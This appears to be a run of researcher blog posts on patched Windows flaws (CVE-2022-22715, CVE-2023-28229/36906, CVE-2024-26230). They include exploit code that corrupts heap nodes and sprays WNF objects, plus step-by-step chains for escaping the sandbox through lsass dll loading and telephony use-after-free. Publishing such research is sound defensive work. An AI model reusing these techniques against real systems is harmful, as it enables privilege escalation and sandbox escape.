        if (pTargetChunk == pRootChunkAddr & 0xffffffffffff0000) {
            X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr, (UINT64)&fakenode, (UINT64)sizeof(FAKETREENODE), (UINT64)&dwByte);
            X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr + 0x10, (UINT64)&pTempRootChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte);
            break;
        }
        pTempRootChunk = pRootChunkAddr;
        if (pLeftChunk > pRootChunkAddr) {
            X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pLeftChunk, (UINT64)&fakenode, (UINT64)sizeof(FAKETREENODE), (UINT64)&dwByte);
            pRootChunkAddr = pRightChunk;
            continue;
        }
        else if (pRootChunkAddr > pRightChunk) {
            X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRightChunk, (UINT64)&fakenode, (UINT64)sizeof(FAKETREENODE), (UINT64)&dwByte);
            pRootChunkAddr = pLeftChunk;
            continue;
        }
        if (pTargetChunk < pRootChunkAddr) {
            pRootChunkAddr = pLeftChunk;
            continue;
        }
        if (pTargetChunk > pRootChunkAddr) {
            pRootChunkAddr = pRightChunk;
            continue;
        }
    }

    pRootChunkAddr = pTempRightChunk; // ====> traversal from right chunk
    while (pLeftChunk != 0 && pRightChunk != 0) {
        X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr, (UINT64)&pLeftChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte);
        X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr + 0x8, (UINT64)&pRightChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte);
        if (pTargetChunk == pRootChunkAddr & 0xffffffffffff0000) {
            X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr, (UINT64)&fakenode, (UINT64)sizeof(FAKETREENODE), (UINT64)&dwByte);
            X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr + 0x10, (UINT64)&pTempRootChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte);
            break;
        }
        pTempRootChunk = pRootChunkAddr;
        if (pLeftChunk > pRootChunkAddr) {
            X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pLeftChunk, (UINT64)&fakenode, (UINT64)sizeof(FAKETREENODE), (UINT64)&dwByte);
            pRootChunkAddr = pRightChunk;
            continue;
        }
        else if (pRootChunkAddr > pRightChunk) {
            X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRightChunk, (UINT64)&fakenode, (UINT64)sizeof(FAKETREENODE), (UINT64)&dwByte);
            pRootChunkAddr = pLeftChunk;
            continue;
        }
        if (pTargetChunk < pRootChunkAddr) {
            pRootChunkAddr = pLeftChunk;
            continue;
        }
        if (pTargetChunk > pRootChunkAddr) {
            pRootChunkAddr = pRightChunk;
            continue;
        }
    }

After all fix, it's time to pop cmd. Because Adobe Reader render process in a Job, I can't create process from it, so I inject shellcode to browser process and write a file in volume C: to complete exploit.

Patch

Microsoft patched the vulnerability in February 2022, npfs uses int type to calculate the total size and check if the total size larger than maximum ushort value.

NTSTATUS __fastcall NpTranslateContainerLocalAlias(struct _UNICODE_STRING *a1, void *a2, _DWORD *a3)
{
[...]
  if ( v13 )
      {
        if ( TokenInformation )
        {
          v20 = DestinationString.Length + v37.Length;
          v21 = v20 + 120;
          v22 = v20 + 122;
        }
        else
        {
          v21 = v37.Length + 96;
          v22 = v37.Length + 98;
        }
      }
      else
      {
        v21 = DestinationString.Length + 112;
        v22 = DestinationString.Length + 114;
      }
      if ( !v18 )
        v22 = v21;
      v23 = v19 + v22;
      if ( v23 <= 0xFFFE )
      {
        v28.MaximumLength = v23;
        Pool2 = (WCHAR *)ExAllocatePool2(256i64, (unsigned __int16)v23, 1850110030i64);
[...]
}

Demonstrate how I use WNF API with a accessible SD

BOOLEAN AllocateWnfObject(DWORD dwWantedSize, PWNF_STATE_NAME pStateName) {
    NTSTATUS Status;
    HANDLE gProcessToken;
    WNF_TYPE_ID TypeID = { 0 };
    PSECURITY_DESCRIPTOR SecurityDescriptor;
    ULONG RetLength = 0;
    BOOL DaclPresent, SaclPresent;
    BOOL DaclDefault, SaclDefault, OwnerDefault, GroupDefault;
    PACL pDacl, pSacl;
    PSID pOwner, pGroup;
    ACE_HEADER* AceHeader;
    ACCESS_ALLOWED_ACE* pACE;
    PSECURITY_DESCRIPTOR GetSD;
    
    Status = fNtOpenProcessToken(GetCurrentProcess(), MAXIMUM_ALLOWED, &gProcessToken);
    if (Status < 0) {
        return FALSE;
    }
    
    SecurityDescriptor = (PSECURITY_DESCRIPTOR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x1000); // initialize a new SD

    GetSD = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x1000);

    Status = fNtQuerySecurityObject(
        gProcessToken,
        OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION | LABEL_SECURITY_INFORMATION,
        GetSD,
        0x1000,
        &RetLength); // Query a accessible SD from process token

    if (Status < 0)
    {
        return FALSE;
    }

    // Get Owner/Group/DACL/SACL from accessible security object
    GetSecurityDescriptorOwner(GetSD, &pOwner, &OwnerDefault);
    GetSecurityDescriptorGroup(GetSD, &pGroup, &GroupDefault);
    GetSecurityDescriptorDacl(GetSD, &DaclPresent, &pDacl, &DaclDefault);
    GetSecurityDescriptorSacl(GetSD, &SaclPresent, &pSacl, &SaclDefault);

    AceHeader = (ACE_HEADER*)&pDacl[1];
    while ((DWORD)AceHeader < (DWORD)pDacl + (DWORD)pDacl->AclSize)
    {
        if (AceHeader->AceType == ACCESS_ALLOWED_ACE_TYPE)
        {
            pACE = (ACCESS_ALLOWED_ACE*)&AceHeader[0];
            pACE->Mask = GENERIC_ALL;
        }
        AceHeader = (ACE_HEADER*)((DWORD)AceHeader + (DWORD)AceHeader->AceSize);
    }

   // Set it to new SD
    InitializeSecurityDescriptor(SecurityDescriptor, SECURITY_DESCRIPTOR_REVISION);
    SetSecurityDescriptorOwner(SecurityDescriptor, pOwner, OwnerDefault);
    SetSecurityDescriptorGroup(SecurityDescriptor, pGroup, GroupDefault);
    SetSecurityDescriptorDacl(SecurityDescriptor, DaclPresent, pDacl, DaclDefault);
    SetSecurityDescriptorSacl(SecurityDescriptor, SaclPresent, pSacl, SaclDefault);

    HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, GetSD);

    Status = fNtCreateWnfStateName(
        pStateName,
        WnfTemporaryStateName,      
        WnfDataScopeSession,    
        FALSE,
        &TypeID,
        0x1000,
        SecurityDescriptor);  // invoke WNF API with new SD

    if (Status < 0)
    {
        return FALSE;
    }

    PVOID lpBuff = (PVOID)malloc(dwWantedSize - 0x20);
    memset(lpBuff, 0x00, dwWantedSize - 0x20);

    Status = fNtUpdateWnfStateData(
        pStateName,
        lpBuff,
        dwWantedSize - 0x20,
        &TypeID,
        NULL,
        0,
        0);

    if (Status < 0)
    {
        return FALSE;
    }
    free(lpBuff);
    return TRUE;
}

Reference

Security Update Guide - Microsoft Security Response Center

CVE-2022-22715 PoC

Time line

2021-10-17 Reported vulnerability to Microsoft via TianfuCup 2021
2022-02-08 Microsoft released patch, assigned CVE-2022-22715
2022-08-23 Blogpost is publiced in partnership with Adobe Product Security Incident Response Team

WHEREISK0SHL
Isolate me from sandbox - Explore elevation of privilege of CNG Key IsolationWHEREISK0SHL
1 September 2023 at 11:18

Isolate me from sandbox - Explore elevation of privilege of CNG Key Isolation

WHEREISK0SHL

By: WHEREISK0SHL

1 September 2023 at 11:18

Author: k0shl of Cyber Kunlun

Summary

In recently months, Microsoft patched vulnerabilities I reported in CNG Key Isolation service, assigned CVE-2023-28229 and CVE-2023-36906, the CVE-2023-28229 included 6 use after free vulenrabilities with similar root cause and the CVE-2023-36906 is a out of bound read information disclosure. Microsoft marked them as "Exploitation Less Likely" in assessment status, but actually, I completed the exploitation with these two vulnerabilities.

As an annual update blogger(sorry for that:P), I share this blogpost to introduce my exploitation on CNG Key Isolation service, so let's start our journey!

Simple Overview

CNG Key Isolation is a service under lsass process which provides key process isolation to private keys, the CNG Key Isolation is worked as a RPC server that could be accessed with the Appcontainer Integrity process such as the render process in adobe or firefox. There are some important objects in keyiso service, let's go through them simply as following:

Context object. Context object is just like the manage object of keyiso RPC server, it will hold the provider object when the client invoke open storage provider to create a new provider object and it is managed by a global list named SrvCryptContextList. This object must be intialized first.
Provider object. Client should open an existed provider in a collection of all of the providers, if the provider open succeed, it will allocate the provider object and store the pointer into the context object.
Key object. Key object is managed by context object, it will be allocated and inserted into the context object.
Memory Buffer object. Memory Buffer object is managed by context object, it will be allocate and inserted into the context object.
Secret object. Secret object is managed by context object, it will be allocate and inserted into the context object.

In these four objects, provider object/key object/secret object have similar object structure, offset 0x0 of the object stores the magic value, 0x44444446 means provider object, 0x44444447 means key object, 0x44444449 means secret object, when these objects freed, the magic value will be set to another value, offset 0x8 of the object stores the reference count, and offset 0x30 of the object stores the index of the object, this index is just like the handle of the object, it will be a flag when client use it to search the specified object which means the object is predictable, it is begin at 0 and when a new object allocated, it will add 1.

There is additional information to talk about how I win the race with the handle of object, when I review the code, I noticed that the handle could be predictable, let's check the SrvAddKeyToList function:

SrvAddKeyToList:
  handlevalue = ++*(_QWORD *)(context_object + 0xA0); // =====> [a]
  *(_QWORD *)(key_object + 0x30) = handlevalue; // =====> [b]

SrvFreeKey:
  if ( *((_QWORD *)key_object + 6) == handlevalue ) // ====> [c]
      break;

The handle value is stored in the offset 0xA0 of context object, and in fact, the handle value is just like a index value, the initilized value is 0, and when a new key object is allocated, the index will add 1 [a] and be set to the offset 0x30 of new key object [b]. When the key object is freed, it will compare the handle value, if it matched [c], it will continue to hit vulnerable code. So the handle value could be predictable, for example, you could call SrvFreeKey with the handle value is 1 when you create the first key, or you could call the SrvFreeKey with the handle value is 10 when you create the No.10 key object, so that the key object could be retrieved in FreeKey function when adding key to context object with the new handle value.

I make the following simple chart to show you the relationship between theses objects.

Root cause of CVE-2023-28229

In this section, I will introduce the root cause of CVE-2023-28299, I will use the key object as example, actually the rest of objects have similar issue.

When I do researching on keyiso service, I find out that each object has their own allocate and free interface, such as key object, there are the allocate RPC interface named s_SrvRpcCryptCreatePersistedKey and the free RPC interface named s_SrvRpcCryptFreeKey. And I quickly notice that there is an issue between object allocate and free.

__int64 __fastcall SrvCryptCreatePersistedKey(
        struct _RTL_CRITICAL_SECTION *a1,
        __int64 a2,
        _QWORD *a3,
        __int64 a4,
        __int64 a5,
        int a6,
        int a7)
{
[...]
    keyobject = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, 0x38ui64);
[...]
    *((_DWORD *)keyobject + 1) = 0;
    *(_DWORD *)keyobject = 0x44444447;
    *((_DWORD *)keyobject + 2) = 1; // ==========> [a]
    *((_QWORD *)keyobject + 4) = v12;
    SrvAddKeyToList((__int64)a1, (__int64)keyobject); // =============> [b]
    v11 = 0;
    *a3 = *((_QWORD *)keyobject + 6);
    return v11;
[...]
}

__int64 __fastcall SrvCryptFreeKey(__int64 a1, __int64 a2, __int64 a3)
{
[...]
  if ( _InterlockedExchangeAdd(freebuffer + 2, 0xFFFFFFFF) == 1 ) // ============> [c]
  {
    v17 = SrvFreeKey((PVOID)freebuffer); // ===============> [d]
    if ( v17 < 0 )
      DebugTraceError(
        (unsigned int)v17,
        "Status",
        "onecore\\ds\\security\\cryptoapi\\ncrypt\\iso\\service\\srvutils.c",
        700i64);
  }
  if ( _InterlockedExchangeAdd(freebuffer + 2, 0xFFFFFFFF) == 1 ) // ===============> [e]
  {
    v12 = (*(__int64 (__fastcall **)(_QWORD, _QWORD))(*((_QWORD *)freebuffer + 4) + 0x80i64))( // ==============> [f]
            *(_QWORD *)(*((_QWORD *)freebuffer + 4) + 0x118i64),
            *((_QWORD *)freebuffer + 5));
    v13 = v12;
[...]
}

When the client invoke allocate RPC interface, keyiso will allocate a heap from proccess heap and intialize the structure, it will set the reference count of key object to 1 first [a], then it will add the key object to context object, and add the reference count [b], and when client free the key object, keyiso will check if the reference is 1 [c], if it is, keyiso will free the key object [d], but it still use the key object after free [e], then it will call the function in vftable.

There aren't lock function when the reference count of key object is initialized to 1 and added, which means there is a time window between the intialization and addition, the key object will be freed [c] [d] after the reference count is set to 1 [a], and it could pass the next check [e] when reference count add 1 [b], finally, it will cause the use after free when the function of vftable called[f].

I wrote the PoC and figured out that it may be exploitable, but as the code show below, the function of vftable is picked from the pointer stored in offset 0x20 of the keyobject which means even I could control the free buffer, I still need a validate address in the offset 0x20 of the key object. I need a information disclosure.

Root Cause of CVE-2023-36906

Then I try to find out a information disclosure, I go through the RPC interface and find out there is a property structure which is stored in provider object, and the property could be query and set with the RPC interface SPCryptSetProviderProperty and SPCryptGetProviderProperty.

__int64 __fastcall SPCryptSetProviderProperty(__int64 a1, const wchar_t *a2, _DWORD *a3, unsigned int a4, int a5)
{
[...]
    if ( !wcscmp_0(a2, L"Use Context") )
    {
      v15 = *(void **)(v8 + 32);
      if ( v15 )
        RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v15);
      Heap = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, v6);
      *(_QWORD *)(v8 + 32) = Heap;
      if ( !Heap )
      {
        v10 = 1450i64;
LABEL_21:
        v9 = -2146893810;
        v11 = 2148073486i64;
        goto LABEL_42;
      }
      v17 = Heap;
      goto LABEL_40;
      }
      memcpy_0(v17, a3, v6); // ============> [b]
    } 
[...]
}

__int64 __fastcall SPCryptGetProviderProperty(
        __int64 a1,
        const wchar_t *a2,
        _DWORD *a3,
        unsigned int a4,
        unsigned int *a5,
        int a6)
{
[...]
    if ( !wcscmp_0(a2, L"Use Context") )
    {
      v17 = *(_QWORD *)(v10 + 32);
      v15 = 21;
      if ( !v17 )
        goto LABEL_31;
      do
        ++v13;
      while ( *(_WORD *)(v17 + 2 * v13) ); // =============> [c]
      v16 = 2 * v13 + 2;
      if ( 2 * (_DWORD)v13 == -2 )
      {
LABEL_31:
        v11 = 517i64;
LABEL_32:
        v9 = -2146893807;
        v12 = 2148073489i64;
        goto LABEL_57;
      }
      v25 = *(const void **)(v10 + 32);
      memcpy_0(a3, v25, v16); // ============> [d]
    } 
[...]
}

The client could specific which property to set, if the property named "Use Context", it will allocate a new buffer with the size which could be controlled by client, and store the "Use Context" buffer into the provider object, but when I review the query code, I notice that the "Use Context" should be a string type, it will go through the buffer in a while loop and break when it meets the null charactor [c], then return the whole buffer to client.

There will be a out of bound read when I set the "Use Context" property with a non-zero content in buffer, and actually, this property is a good object for exploitation because the size and content of the buffer could be controlled by client.

Exploitation stage

Now, I have a out of bound read which could leak the content of adjacent object and a use after free elevation privilege could call arbitrary address if I could control the free buffer. I think it's time for me to chain the vulnerability.

I look back to the free buffer to find out what I need first:

v12 = (*(__int64 (__fastcall **)(_QWORD, _QWORD))(*((_QWORD *)freebuffer + 4) + 0x80i64))( 
            *(_QWORD *)(*((_QWORD *)freebuffer + 4) + 0x118i64),
            *((_QWORD *)freebuffer + 5));

If I could control the freebuffer, and I have a useful address, I could set this address to the offset 0x20 of freebuffer, and there are two important address in the validate address, the offset 0x80 of the address should be a validate function address, and the offset 0x118 should be another buffer.

The lsass process enable the XFG mitigation, so I couldn't use ROP in this exploitation, but if I could control the first parameter of the function, I could use LoadLibraryW to load a controlled dll path, so the target is set offset 0x80 of validate address to LoadlibraryW address and set the payload dll to the address which stored in offset 0x118 of the address.

As I introduce in the previous section, the property "Use Context" is a good primitive object because I could control the size and whole content of this property, and I have a out of bound read issue, so the question is what object should be adjacent to my property object?

I review all objects of keyiso, and find out the memory buffer may be a useful target.

    v7 = SrvLookupAndReferenceProvider(hContext, hProvider, 0);
    [...]
    _InterlockedIncrement((volatile signed __int32 *)(v7 + 8));
    *(_QWORD *)Heap = v7; // ===========> [a]
    *((_QWORD *)Heap + 1) = v32;
    SrvAddMemoryBufferToList((__int64)hContext, (__int64)Heap);
    v26 = *((_QWORD *)Heap + 4);
    Heap = 0i64;
    *v15 = v26;

When the memory buffer created, keyiso will look up the provider object and store the provider object in the offset 0x0 of the memory buffer[a], so if I fill up property object with non-zero value and when I query the property object, it will leak the provider object address.

And of course, different objects have different size, I don't need to worry about the different object influence the layout when I do heap fengshui.

Finally, I figure out the exploitation scenario as following:

Spray the provider object and memory buffer object. Provider object is for the finaly stage of explointation, and memory buffer is for leak the provider object.

Free some memory buffer objects to make a heap hole, then allocate property with the same size of memory buffer object, it will occupy one of the freed holes, and then query the property to get the provider object address.

Free enough provider objects to make sure the leaked provider object is freed, and spray the properties with the same size of provider object to occupy the leaked provider object address. The LoadlibraryW address and payload dll should be stored in the offset 0x80 and offset 0x118 in the fake provider object. But I only have one leaked address, I could set the payload dll path in another offset in property buffer, and set the address in the offset 0x118 of property buffer.

Finally, I could trigger use after free with mutiple three diffrent threads, Thread A is for allocating the key object, Thread B is for releasing the key object, Thread C is for allocating the property object with the same size of key object, and set the fake reference count and leaked property address in offset 0x20 of property buffer.

When client win the race which means the property object occupy the key object hole after key object freed at SrvFreeKey function, it will finally load arbitrary dll in lsass process which finally cause appcontainer sandbox escape.

Patch

Microsoft patch with adding the lock functions between the key object intialized and freed.

Before:

[...]
  RtlLeaveCriticalSection(v5);
  if ( _InterlockedExchangeAdd(freebuffer + 2, 0xFFFFFFFF) == 1 )
  {
    v17 = SrvFreeKey((PVOID)freebuffer);
    if ( v17 < 0 )
      DebugTraceError(
        (unsigned int)v17,
        "Status",
        "onecore\\ds\\security\\cryptoapi\\ncrypt\\iso\\service\\srvutils.c",
        700i64);
  }
  if ( _InterlockedExchangeAdd(freebuffer + 2, 0xFFFFFFFF) == 1 )
  {
    v12 = (*(__int64 (__fastcall **)(_QWORD, _QWORD))(*((_QWORD *)freebuffer + 4) + 0x80i64))(
            *(_QWORD *)(*((_QWORD *)freebuffer + 4) + 0x118i64),
            *((_QWORD *)freebuffer + 5));
[...]

After:

[...]
    RtlEnterCriticalSection(v8);
    v12 = *((_QWORD *)v9 + 2);
    if ( *(volatile signed __int64 **)(v12 + 8) != v9 + 2
      || (v13 = (volatile signed __int64 **)*((_QWORD *)v9 + 3), *v13 != v9 + 2) )
    {
      __fastfail(3u);
    }
    *v13 = (volatile signed __int64 *)v12;
    *(_QWORD *)(v12 + 8) = v13;
    if ( _InterlockedExchangeAdd64(v9 + 1, 0xFFFFFFFFFFFFFFFFui64) == 1 )
    {
      v14 = SrvFreeKey(v9);
      if ( v14 < 0 )
        DebugTraceError(
          (unsigned int)v14,
          "Status",
          "onecore\\ds\\security\\cryptoapi\\ncrypt\\iso\\service\\srvutils.c",
          705i64);
    }
    RtlLeaveCriticalSection(v8);
    if ( _InterlockedExchangeAdd64(v9 + 1, 0xFFFFFFFFFFFFFFFFui64) == 1 )
    {
      v15 = (*(__int64 (__fastcall **)(_QWORD, _QWORD))(*((_QWORD *)v9 + 4) + 128i64))(
              *(_QWORD *)(*((_QWORD *)v9 + 4) + 280i64),
              *((_QWORD *)v9 + 5));
[...]

Thanks for discussing with @chompie1337, @DannyOdler and @cplearns2h4ck. Actually even after patch, there should be UAF after SrvFreeKey get called, because SrvFreeKey function must free the key object but there still be a reference after the function returned, but the function seems never could be called, this is weird code that I don't know why Microsoft designed it like this, but after they add lock function between key object is intialized and freed, the UAF race condition got fixed.

WHEREISK0SHL
A trick, the story of CVE-2024-26230WHEREISK0SHL
10 April 2024 at 09:43

A trick, the story of CVE-2024-26230

WHEREISK0SHL

By: WHEREISK0SHL

10 April 2024 at 09:43

Author: k0shl of Cyber Kunlun

Summary

In April 2024, Microsoft patched a use-after-free vulnerability in the telephony service, which I reported and assigned to CVE-2024-26230. I have already completed exploitation, employing an interesting trick to bypass XFG mitigation on Windows 11.

Moving forward, in my personal blog posts regarding my vulnerability and exploitation findings, I aim not only to introduce the exploit stage but also to share my thought process on how I completed the exploitation step by step. In this blog post, I will delve into the technique behind the trick and the exploitation of CVE-2024-26230.

Root Cause

The telephony service is a RPC based service which is not running by default, but it could be actived by invoking StartServiceW API with normal user privilege.

There are only three functions in telephony RPC server interface.

long ClientAttach(
    [out][context_handle] void** arg_0, 
    [in]long arg_1, 
    [out]long *arg_2, 
    [in][string] wchar_t* arg_3, 
    [in][string] wchar_t* arg_4);

void ClientRequest(
    [in][context_handle] void* arg_0, 
    [in][out] /* [DBG] FC_CVARRAY */[size_is(arg_2)][length_is(, *arg_3)]char *arg_1/*[] CONFORMANT_ARRAY*/, 
    [in]long arg_2, 
    [in][out]long *arg_3);

void ClientDetach(
    [in][out][context_handle] void** arg_0);
}

It's easy to understand that the ClientAttach method could create a context handle, the ClientRequest method could process requests using the specified context handle, and the ClientDetach method could release the context handle.

In fact, there is a global variable named "gaFuncs," which serves as a router variable to dispatch to specific dispatch functions within the ClientRequest method. The dispatch function it routes to depends on a value that could be controlled by an attacker.

Within the dispatch functions, numerous objects can be processed. These objects are created by the function NewObject, which inserts them into a global handle table named "ghHandleTable." Each object holds a distinct magic value. When the telephony service references an object, it invokes the function ReferenceObject to compare the magic value and retrieve it from the handle table.

The vulnerability exists with objects that possess the magic value "GOLD" which can be created by the function "GetUIDllName".

void __fastcall GetUIDllName(__int64 a1, int *a2, unsigned int a3, __int64 a4, _DWORD *a5)
{
[...]
if ( object )
      {
        *object = 0x474F4C44; // =====> [a]
        v38 = *(_QWORD *)(contexthandle + 184);
        *((_QWORD *)object + 10) = v38;
        if ( v38 )
          *(_QWORD *)(v38 + 72) = object;
        *(_QWORD *)(contexthandle + 184) = object; // =======> [b]
        a2[8] = object[22];
      }
[...]
}

As the code above, service stores the magic value 0x474F4C44(GOLD) into the object[a] and inserts object into the context handle object[b].Typically, most objects are stored within the context handle object, which is initialized in the ClientAttach function. When the service references an object, it checks whether the object is owned by the specified context handle object, as demonstrated in the following code:

    v28 = ReferenceObject(v27, a3, 0x494C4343); // reference the object
    if ( v28
      && (TRACELogPrint(262146i64, "LineProlog: ReferenceObject returned ptCallClient %p", v28),
          *((_QWORD *)v28 + 1) == context_handle_object) // check whether the object belong to context handle object )
    {

However, when the "GOLD" object is freed, it doesn't check whether the object is owned by the context handle. Therefore, I can exploit this by creating two context handles: one that holds the "GOLD" object and another to invoke the dispatch function "FreeDiagInstance" to free the "GOLD" object. Consequently, the "GOLD" object is freed while the original context handle object still holds the "GOLD" object pointer.

__int64 __fastcall FreeDialogInstance(unsigned __int64 a1, _DWORD *a2)
{
[...]
v4 = (_DWORD *)ReferenceObject(a1, (unsigned int)a2[2], 0x474F4C44i64);
  [...]
  if ( *v4 == 0x474F4C44 ) // only check if the magic value is equal to 0x474f4c44, it doesn't check if the object belong to context handle object
[...]
  // free the object
}

This results in the original context handle object holding a dangling pointer. Consequently, the dispatch function "TUISPIDLLCallback" utilizes this dangling pointer, leading to a use-after-free vulnerability. As a result, the telephony service crashes when attempting to reference a virtual function.

__int64 __fastcall TUISPIDLLCallback(__int64 a1, _DWORD *a2, int a3, __int64 a4, _DWORD *a5)
{
[...]
 v7 = (unsigned int)controlledbuffer[2];
  v8 = 0i64;
  v9 = controlledbuffer + 4;
  v10 = controlledbuffer + 5;
  if ( (unsigned int)IsBadSizeOffset(a3, 0, controlledbuffer[5], controlledbuffer[4], 4) )
    goto LABEL_30;
  switch ( controlledbuffer[3] )
  {
[...]
case 3:
      for ( freedbuffer = *(_QWORD *)(context_handle_object + 0xB8); freedbuffer; freedbuffer = *(_QWORD *)(freedbuffer + 80) ) // ===========> context handle object holds the dangling pointer at offset 0xB8
      {
        if ( controlledbuffer[2] == *(_DWORD *)(freedbuffer + 16) ) // compare the value
        {
          v8 = *(__int64 (__fastcall **)(__int64, _QWORD, __int64, _QWORD))(freedbuffer + 32); // reference the virtual function within dangling pointer
          goto LABEL_27;
        }
      }
      break;
[...]

 if ( v8 )
  {
    result = v8(v7, (unsigned int)controlledbuffer[3], a4 + *v9, *v10); // ====> trigger UaF
[...]
}

Note that the controllable buffer in the code above refers to the input buffer of the RPC client, where all content can be controlled by the attacker. This ultimately leads to a crash.

0:001> R
rax=0000000000000000 rbx=0000000000000000 rcx=3064c68a8d720000
rdx=0000000000080006 rsi=0000000000000000 rdi=00000000474f4c44
rip=00007ffcb4b4955c rsp=000000ec0f9bee80 rbp=0000000000000000
 r8=000000ec0f9bea30  r9=000000ec0f9bee90 r10=ffffffffffffffff
r11=000000ec0f9be9e8 r12=0000000000000000 r13=00000203df002b00
r14=00000203df002b00 r15=000000ec0f9bf238
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
tapisrv!FreeDialogInstance+0x7c:
00007ffc`b4b4955c 393e            cmp     dword ptr [rsi],edi ds:00000000`00000000=????????
0:001> K
 # Child-SP          RetAddr               Call Site
00 000000ec`0f9bee80 00007ffc`b4b47295     tapisrv!FreeDialogInstance+0x7c
01 000000ec`0f9bf1e0 00007ffc`b4b4c8bc     tapisrv!CleanUpClient+0x451
02 000000ec`0f9bf2a0 00007ffc`d9b85809     tapisrv!PCONTEXT_HANDLE_TYPE_rundown+0x9c
03 000000ec`0f9bf2e0 00007ffc`d9b840f6     RPCRT4!NDRSRundownContextHandle+0x21
04 000000ec`0f9bf330 00007ffc`d9bcb935     RPCRT4!DestroyContextHandlesForGuard+0xbe
05 000000ec`0f9bf370 00007ffc`d9bcb8b4     RPCRT4!OSF_ASSOCIATION::~OSF_ASSOCIATION+0x5d
06 000000ec`0f9bf3a0 00007ffc`d9bcade4     RPCRT4!OSF_ASSOCIATION::`vector deleting destructor'+0x14
07 000000ec`0f9bf3d0 00007ffc`d9bcad27     RPCRT4!OSF_ASSOCIATION::RemoveConnection+0x80
08 000000ec`0f9bf400 00007ffc`d9b8704e     RPCRT4!OSF_SCONNECTION::FreeObject+0x17
09 000000ec`0f9bf430 00007ffc`d9b861ea     RPCRT4!REFERENCED_OBJECT::RemoveReference+0x7e
0a 000000ec`0f9bf510 00007ffc`d9b97f5c     RPCRT4!OSF_SCONNECTION::ProcessReceiveComplete+0x18e
0b 000000ec`0f9bf610 00007ffc`d9b97e22     RPCRT4!CO_ConnectionThreadPoolCallback+0xbc
0c 000000ec`0f9bf690 00007ffc`d8828f51     RPCRT4!CO_NmpThreadPoolCallback+0x42
0d 000000ec`0f9bf6d0 00007ffc`db34aa58     KERNELBASE!BasepTpIoCallback+0x51
0e 000000ec`0f9bf720 00007ffc`db348d03     ntdll!TppIopExecuteCallback+0x198

Find Primitive

When I discovered this vulnerability, I quickly realized that it could be exploited because I can control the timing of both releasing and using object.

However, the first challenge of exploitation is that I need an exploit primitive. The Ring 3 world is different from the Ring 0 world. In kernel mode, I could use various objects as primitives, even if they are different types. But in user mode, I can only use objects within the same process. This means that I can't exploit the vulnerability if there isn't a suitable object in the target process.

So, I need to ensure whether there is a suitable object in the telephony service. There is a small tip that I don't even need an 'object.' What I want is just a memory allocation that I can control both size and content.

After reverse engineering, I discovered an interesting primitive. There is a dispatch function named "TRequestMakeCall" that opens the registry key of the telephony service and allocates memory to store key values.

if ( !RegOpenCurrentUser(0xF003Fu, &phkResult) ) // ==========> [a]
  {
    if ( !RegOpenKeyExW(
            phkResult,
            L"Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities",
            0,
            0x20019u,
            &hKey) )
    {
      GetPriorityList(hKey, L"RequestMakeCall"); // ==========> [b]
      RegCloseKey(hKey);
    }
    
///////////////////////////////////////////
if ( RegQueryValueExW(hKey, lpValueName, 0i64, &Type, 0i64, &cbData) || !cbData ) // =============> [c]
  {
    [...]
  }
  else
  {
    v6 = HeapAlloc(ghTapisrvHeap, 8u, cbData + 2); // ===========> [d]
    v7 = (wchar_t *)v6;
    if ( v6 )
    {
      *(_WORD *)v6 = 34;
      LODWORD(v6) = RegQueryValueExW(hKey, lpValueName, 0i64, &Type, (LPBYTE)v6 + 2, &cbData); // ==============> [e]
      [...]
  }

In the dispatch function "TRequestMakeCall," it first opens the HKCU root key [a] and invokes the GetPriorityList function to obtain the "RequestMakeCall" key value. After checking the key privilege, it's determined that this key can be fully controlled by the current user, meaning I could modify the key value. In the function "GetPriorityList," it first retrieves the type and size of the key, then allocates a heap to store the key value. This implies that if I can control the key value, I can also control both the heap size and the content of the heap.

The default type of "RequestMakeCall" is REG_SZ, but since the current user has full control privilege over it, I can delete the default value and create a REG_BINARY type key value. This allows me to set both the size and content to arbitrary values, making it a useful primitive.

Heap Fengshui

After ensure there is a suitable primitive, I think it's time to perform heap feng shui now. Because I can control the timing of allocating, releasing, and using the object, it's easy to come up with a layout.

First, I allocate enough "GOLD" objects using the "GetUIDllName" function.
Then, I free some of them to create some holes using the "FreeDiagInstance" function.
Next, I allocate a worker "GOLD" object to trigger the use-after-free vulnerability.
After that, I free the worker object with the vulnerability. This time, the worker context handle object still holds the dangling pointer of the worker object.
Following this, I delete the "RequestMakeCall" key value and create a REG_BINARY type key with controlled content. Then, I allocate some key value heaps to ensure they occupy the hole left by the worker object.

XFG mitigation

After the final step of heap fengshui in the previous section, the controlled key value heap occupies the target hole, and when I invoke "TUISPIDLLCallback" function to trigger the "use" step, as the pseudo code above, controlled buffer is the input buffer of RPC interface, if I set it to 3, it will compare a magic value with the worker object, then obtain a virtual function address from the worker object, so that I only need to set this two value in the content of registry key value.

